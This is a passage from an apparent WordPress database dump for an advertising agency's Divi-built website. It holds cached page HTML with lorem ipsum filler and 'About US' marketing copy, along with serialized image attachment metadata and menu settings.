Integer interdum interdum purus non lobortis. Ut felis velit, sollicitudin.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_2 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_2\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_2  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_4 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Lorem Ipsum Dolor<br />\nDonec tempor tortor sit amet sodales blandit. Suspendisse potenti. Proin at commodo lectus. Integer interdum interdum purus non lobortis. Ut felis velit, sollicitudin a libero ultricies, gravida scelerisque elit. Integer euismod vitae magna bibendum feugiat.<br />\nSed tempor magna quis feugiat elementum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_3  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_1 et_animated et-waypoint\">\n				\n				\n				<span class=\"et_pb_image_wrap \"><img src=\"https://i0.wp.com/52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png?w=1080&#038;ssl=1\" alt title data-recalc-dims=\"1\" data-lazy-srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/07/home-office-07-1.png?w=800&amp;ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/07/home-office-07-1.png?resize=300%2C300&amp;ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/07/home-office-07-1.png?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/07/home-office-07-1.png?resize=768%2C768&amp;ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/07/home-office-07-1.png?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i0.wp.com/52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i0.wp.com/52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png?w=1080&#038;ssl=1\" alt=\"\" title=\"\" srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/07/home-office-07-1.png?w=800&ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/07/home-office-07-1.png?resize=300%2C300&ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/07/home-office-07-1.png?resize=150%2C150&ssl=1 150w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/07/home-office-07-1.png?resize=768%2C768&ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/07/home-office-07-1.png?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript></span>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_3 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_3\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_4  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_2 et_animated et-waypoint\">\n				\n				\n				<a href=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-02.jpg\" class=\"et_pb_lightbox_image\" title=\"\"><span class=\"et_pb_image_wrap \"><img src=\"https://i1.wp.com/52.66.212.87/wp-content/uploads/2020/07/background-split-02.jpg?w=1080&#038;ssl=1\" alt title data-recalc-dims=\"1\" data-lazy-src=\"https://i1.wp.com/52.66.212.87/wp-content/uploads/2020/07/background-split-02.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i1.wp.com/52.66.212.87/wp-content/uploads/2020/07/background-split-02.jpg?w=1080&#038;ssl=1\" alt=\"\" title=\"\" data-recalc-dims=\"1\" /></noscript></span></a>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_5  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_5 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Lorem Ipsum Dolor<br />\nDonec tempor tortor sit amet sodales blandit. Suspendisse potenti. Proin at commodo lectus. Integer interdum interdum purus non lobortis.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --></p>\n'),(577,236,'_et_pb_truncate_post_date','2022-01-15 17:33:24'),(578,236,'_et_builder_version','VB|Divi|4.4.9'),(579,236,'_et_pb_show_page_creation','off'),(582,324,'_wp_attached_file','2020/07/Desktop-HD-1024x728-1.png'),(583,324,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:728;s:4:\"file\";s:33:\"2020/07/Desktop-HD-1024x728-1.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Desktop-HD-1024x728-1-300x213.png\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"Desktop-HD-1024x728-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"Desktop-HD-1024x728-1-768x546.png\";s:5:\"width\";i:768;s:6:\"height\";i:546;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:33:\"Desktop-HD-1024x728-1-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:34:\"Desktop-HD-1024x728-1-1024x675.png\";s:5:\"width\";i:1024;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:33:\"Desktop-HD-1024x728-1-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:33:\"Desktop-HD-1024x728-1-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:33:\"Desktop-HD-1024x728-1-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:33:\"Desktop-HD-1024x728-1-980x697.png\";s:5:\"width\";i:980;s:6:\"height\";i:697;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:33:\"Desktop-HD-1024x728-1-480x341.png\";s:5:\"width\";i:480;s:6:\"height\";i:341;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(584,324,'_wp_attachment_image_alt','Creative agency cover image'),(585,327,'_wp_attached_file','2020/07/Artboard-Copy-1.png'),(586,327,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:199;s:6:\"height\";i:25;s:4:\"file\";s:27:\"2020/07/Artboard-Copy-1.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-Copy-1-150x25.png\";s:5:\"width\";i:150;s:6:\"height\";i:25;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(587,327,'_wp_attachment_image_alt','logo WhatTheHell?'),(588,328,'_wp_attached_file','2020/07/WTH-LOGIN-1.png'),(589,328,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:80;s:6:\"height\";i:80;s:4:\"file\";s:23:\"2020/07/WTH-LOGIN-1.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(590,328,'_wp_attachment_image_alt','WhatTheHell? Thumbnail'),(591,329,'_wp_attached_file','2020/07/cropped-WTH-LOGIN-1.png'),(592,329,'_wp_attachment_context','site-icon'),(593,329,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:31:\"2020/07/cropped-WTH-LOGIN-1.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"cropped-WTH-LOGIN-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"cropped-WTH-LOGIN-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:31:\"cropped-WTH-LOGIN-1-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:31:\"cropped-WTH-LOGIN-1-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:31:\"cropped-WTH-LOGIN-1-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:31:\"cropped-WTH-LOGIN-1-400x512.png\";s:5:\"width\";i:400;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:31:\"cropped-WTH-LOGIN-1-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:31:\"cropped-WTH-LOGIN-1-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:31:\"cropped-WTH-LOGIN-1-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:31:\"cropped-WTH-LOGIN-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:29:\"cropped-WTH-LOGIN-1-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(596,1,'_et_pb_truncate_post','<div class=\"et_pb_section et_pb_section_0 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_0\">\n								<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_0  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_0  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Welcome to WordPress. This is your first post. Edit or delete it, then start writing!</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->			\n				\n				\n			</div> <!-- .et_pb_row -->		\n				\n				\n			</div> <!-- .et_pb_section -->\n'),(597,1,'_et_pb_truncate_post_date','2020-07-13 09:13:29'),(598,333,'_wp_attached_file','2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png'),(599,333,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2870;s:6:\"height\";i:1561;s:4:\"file\";s:47:\"2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-07-19-at-2.05.17-AM-300x163.png\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"Screenshot-2020-07-19-at-2.05.17-AM-1024x557.png\";s:5:\"width\";i:1024;s:6:\"height\";i:557;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-07-19-at-2.05.17-AM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-07-19-at-2.05.17-AM-768x418.png\";s:5:\"width\";i:768;s:6:\"height\";i:418;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:48:\"Screenshot-2020-07-19-at-2.05.17-AM-1536x835.png\";s:5:\"width\";i:1536;s:6:\"height\";i:835;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:49:\"Screenshot-2020-07-19-at-2.05.17-AM-2048x1114.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1114;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-07-19-at-2.05.17-AM-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:48:\"Screenshot-2020-07-19-at-2.05.17-AM-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-07-19-at-2.05.17-AM-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-07-19-at-2.05.17-AM-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:48:\"Screenshot-2020-07-19-at-2.05.17-AM-1080x587.png\";s:5:\"width\";i:1080;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-07-19-at-2.05.17-AM-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:48:\"Screenshot-2020-07-19-at-2.05.17-AM-1280x696.png\";s:5:\"width\";i:1280;s:6:\"height\";i:696;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-07-19-at-2.05.17-AM-980x533.png\";s:5:\"width\";i:980;s:6:\"height\";i:533;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-07-19-at-2.05.17-AM-480x261.png\";s:5:\"width\";i:480;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(600,333,'_wp_attachment_image_alt','Video digital advertising'),(607,142,'_edit_lock','1595106364:1'),(614,349,'_wp_attached_file','2020/07/Artboard-4.png'),(615,349,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:848;s:4:\"file\";s:22:\"2020/07/Artboard-4.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Artboard-4-300x133.png\";s:5:\"width\";i:300;s:6:\"height\";i:133;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Artboard-4-1024x452.png\";s:5:\"width\";i:1024;s:6:\"height\";i:452;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Artboard-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Artboard-4-768x339.png\";s:5:\"width\";i:768;s:6:\"height\";i:339;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"Artboard-4-1536x678.png\";s:5:\"width\";i:1536;s:6:\"height\";i:678;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:22:\"Artboard-4-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:23:\"Artboard-4-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:22:\"Artboard-4-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:22:\"Artboard-4-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:23:\"Artboard-4-1080x477.png\";s:5:\"width\";i:1080;s:6:\"height\";i:477;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:22:\"Artboard-4-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:23:\"Artboard-4-1280x565.png\";s:5:\"width\";i:1280;s:6:\"height\";i:565;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:22:\"Artboard-4-980x433.png\";s:5:\"width\";i:980;s:6:\"height\";i:433;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:22:\"Artboard-4-480x212.png\";s:5:\"width\";i:480;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(616,349,'_wp_attachment_image_alt','creative services'),(632,134,'_et_pb_old_content','<!-- wp:elfsight-whatsapp-chat/block {\"id\":\"1\",\"exist\":true} /-->'),(633,226,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:16:\"et-gf-montserrat\";s:137:\"Montserrat:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}}'),(642,392,'_edit_lock','1616067439:1'),(643,392,'_et_pb_use_builder','on'),(644,392,'_et_gb_content_width',''),(645,392,'amp_status',''),(646,392,'_edit_last','1'),(647,392,'_et_pb_post_hide_nav','default'),(648,392,'_et_pb_page_layout','et_right_sidebar'),(649,392,'_et_pb_side_nav','off'),(650,392,'_et_pb_built_for_post_type','page'),(651,394,'_menu_item_type','post_type'),(652,394,'_menu_item_menu_item_parent','0'),(653,394,'_menu_item_object_id','392'),(654,394,'_menu_item_object','page'),(655,394,'_menu_item_target',''),(656,394,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(657,394,'_menu_item_xfn',''),(658,394,'_menu_item_url',''),(659,392,'_et_pb_ab_subjects',''),(660,392,'_et_pb_enable_shortcode_tracking',''),(661,392,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"392\" /]'),(662,392,'_et_pb_custom_css',''),(663,392,'_et_pb_gutter_width','3'),(664,392,'_thumbnail_id','0'),(665,392,'_et_pb_first_image',''),(666,392,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_0 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_0 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_0  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_0 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\" data-et-multi-view=\"{&quot;schema&quot;:{&quot;content&quot;:{&quot;desktop&quot;:&quot;About US&quot;,&quot;tablet&quot;:&quot;&quot;}},&quot;slug&quot;:&quot;et_pb_text&quot;}\" data-et-multi-view-load-tablet-hidden=\"true\">About US</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_divider_0 et_animated et_pb_space et_pb_divider_hidden\"><div class=\"et_pb_divider_internal\"></div></div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_1 et_animated et_pb_section_parallax et_pb_with_background et_section_regular\" >\n				\n				<div class=\"et_parallax_bg_wrap\"><div\n						class=\"et_parallax_bg\"\n						style=\"background-image: url(https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg);\"\n					></div></div>\n				\n				\n					<div class=\"et_pb_row et_pb_row_1\">\n				<div class=\"et_pb_column et_pb_column_2_3 et_pb_column_1  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_1 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Build Brand Equity<br />\nOur advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.<br />\nThere is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_2  et_pb_css_mix_blend_mode_passthrough et-last-child et_pb_column_empty\">\n				\n				\n				\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_2 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_2 et_pb_equal_columns et_pb_gutters2\">\n				<div class=\"et_pb_column et_pb_column_1_3 et_pb_column_3  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_0 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#x6b;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Creative</span></h4>\n						<div class=\"et_pb_blurb_description\">It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_4  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_1 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00a;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Media</span></h4>\n						<div class=\"et_pb_blurb_description\">Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_5  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_2 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00e;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Digital</span></h4>\n						<div class=\"et_pb_blurb_description\">Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_3 et_pb_equal_columns et_pb_gutters2\">\n				<div class=\"et_pb_column et_pb_column_1_3 et_pb_column_6  